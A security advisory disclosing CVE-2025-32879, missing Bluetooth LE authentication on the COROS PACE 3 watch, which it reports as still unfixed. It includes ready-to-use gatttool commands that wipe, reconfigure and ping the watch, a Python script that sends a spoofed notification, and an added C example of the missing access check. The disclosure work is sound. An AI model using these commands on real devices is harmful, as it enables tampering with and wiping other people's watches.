Advisory ID:               SYSS-2025-026
Product:                   COROS PACE 3
Manufacturer:              COROS Wearables, Inc.
Affected Version(s):       <= V 3.0808.0
Tested Version(s):         V 3.0808.0
Vulnerability Type:        Missing Authentication for Critical Function (CWE-306)
Risk Level:                High
Solution Status:           Not yet fixed
Manufacturer Notification: 2025-03-14
Solution Date:             N.A.
Public Disclosure:         2025-06-17
CVE Reference:             CVE-2025-32879
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The COROS PACE 3 is a professional GPS sport smart watch.

The manufacturer describes the product as follows (see [1]):

"Improving on its legendary predecessor in every way, PACE 3 packs an
even more powerful punch. Track your training and recovery with a watch
that's lightweight and comfortable, with advanced technology,
outstanding data accuracy, and backed by the industry-leading COROS
training software system. The COROS PACE 3 paves the way to discover
your potential."

Due to missing authentication for reading and writing Bluetooth Low
Energy (BLE) services and their characteristics, an attacker within
Bluetooth range is able to interact with the COROS PACE 3.
This allows completely controlling the device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The COROS PACE 3 starts advertising if no device is connected via
Bluetooth. This allows an attacker to connect with the device via BLE
if no other device is connected.

While connected, none of the BLE services and characteristics of the
COROS PACE 3 require any authentication or security level.
Therefore, any characteristic, depending on its mode of operation
(read/write/notify), can be used by the connected attacker.

This, e.g., allows configuring the device, sending notifications,
resetting the device to factory settings or installing software files.
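The access check that the details above describe as absent, sketched as an added example (not COROS firmware and not part of the SySS advisory): a simplified ATT write gate that compares the link's LE security level with the level a characteristic requires before a write reaches the command parser. The struct layout, the names and the choice of level 3 for the hardened entry are assumptions; handle 0x0019 is the one written in the advisory's PoC.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* ATT error codes as defined in the Bluetooth Core Specification (Vol 3, Part F) */
#define ATT_OK                      0x00
#define ATT_ERR_WRITE_NOT_PERMITTED 0x03
#define ATT_ERR_INSUFF_AUTHEN       0x05
#define ATT_ERR_INSUFF_ENCRYPT      0x0F

/* LE security mode 1 levels (GAP) */
enum sec_level { SEC_L1_NONE = 1, SEC_L2_ENC_UNAUTH, SEC_L3_ENC_AUTH, SEC_L4_SC_AUTH };

struct attr { uint16_t handle; bool writable; enum sec_level min_write; }; /* hypothetical layout */
struct link { enum sec_level level; bool has_ltk; };                       /* hypothetical layout */

/* Return ATT_OK only if a write to `a` over link `l` may be dispatched. */
uint8_t att_check_write(const struct attr *a, const struct link *l)
{
    if (!a->writable)
        return ATT_ERR_WRITE_NOT_PERMITTED;
    if (l->level >= a->min_write)
        return ATT_OK;
    if (l->level == SEC_L1_NONE)   /* plaintext link: peer must encrypt or pair first */
        return l->has_ltk ? ATT_ERR_INSUFF_ENCRYPT : ATT_ERR_INSUFF_AUTHEN;
    return ATT_ERR_INSUFF_AUTHEN;  /* encrypted, but the pairing was unauthenticated */
}

/* Same characteristic, once with no requirement (as reported) and once hardened. */
const struct attr cmd_as_reported = { 0x0019, true, SEC_L1_NONE };
const struct attr cmd_hardened    = { 0x0019, true, SEC_L3_ENC_AUTH };

/* Constructed link states */
const struct link link_unpaired     = { SEC_L1_NONE, false };       /* never paired */
const struct link link_bonded_plain = { SEC_L1_NONE, true };        /* bonded, not yet encrypted */
const struct link link_just_works   = { SEC_L2_ENC_UNAUTH, true };  /* unauthenticated pairing */
const struct link link_owner        = { SEC_L3_ENC_AUTH, true };    /* authenticated pairing */

int main(void)
{
    printf("as reported, unpaired: 0x%02X\n",
           (unsigned)att_check_write(&cmd_as_reported, &link_unpaired));
    printf("hardened, unpaired:    0x%02X\n",
           (unsigned)att_check_write(&cmd_hardened, &link_unpaired));
    printf("hardened, just works:  0x%02X\n",
           (unsigned)att_check_write(&cmd_hardened, &link_just_works));
    printf("hardened, owner:       0x%02X\n",
           (unsigned)att_check_write(&cmd_hardened, &link_owner));
    return 0;
}
```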

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Example #1: device factory reset:

$ gatttool -b F7:AF:1D:27:03:A5 --char-write-req --handle=0x0019 --value=850001

Example #2: deactivating the do not disturb (DND) setting:

$ gatttool -b F7:AF:1D:27:03:A5 --char-write-req --handle=0x0019 --value=860000010604111c

Example #3: trigger "find my device":

$ gatttool -b F7:AF:1D:27:03:A5 --char-write-req --handle=0x0019 --value=b400

Example #4: sending a malicious notification:

####################
import asyncio

from bleak import BleakClient

# Address of the tested watch and the characteristic written to
DEVICE_ADDRESS = "F7:AF:1D:27:03:b0"
CHARACTERISTIC_UUID = "6e400001b5a3f393e0a977757c7f7f70"
# Notification payload
DATA = bytes.fromhex("7900ff0008636f6d2e7769726510064841434b454420176861636b65642062792053795353200000")


async def write_to_ble_device():
    client = BleakClient(DEVICE_ADDRESS)
    try:
        # Plain connect; no pairing or bonding takes place
        await client.connect()
        await asyncio.sleep(2)
        if client.is_connected:
            print(f"connected to {DEVICE_ADDRESS}")
            await client.write_gatt_char(CHARACTERISTIC_UUID, DATA, response=False)
            print("Press ctrl-c to disconnect")
            # Keep the connection open until interrupted
            await asyncio.Event().wait()
    except Exception as e:
        print(f"Error: {e}")
    finally:
        if client.is_connected:
            await client.disconnect()


asyncio.run(write_to_ble_device())
####################

Executing the script:

$ python3 poc.py

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Not yet fixed

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-03-10: Vulnerability discovered
2025-03-14: Vulnerability reported to manufacturer
2025-03-14: Confirmation of receipt received
2025-03-17: Asked the manufacturer for an update
2025-03-31: More information provided to the manufacturer
2025-04-07: Asked the manufacturer for an update
2025-04-14: Informed the manufacturer about the assigned CVE-ID and
            asked for an update once again
2025-04-15: Answer received from the manufacturer; manufacturer
            informed SySS GmbH that a fix for the vulnerability is
            planned for the end of the year (2025)
2025-04-15: Receipt confirmed, and the issue was clarified once more,
            along with a recommendation for prompt resolution
2025-06-17: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] COROS PACE 3 product website
    https://eu.coros.com/pace3
[2] SySS Security Advisory SYSS-2025-026
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-026.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] CVE-2025-32879
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32879
[5] Detailed blog post
    https://blog.syss.com/posts/bluetooth-analysis-coros-pace-3/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en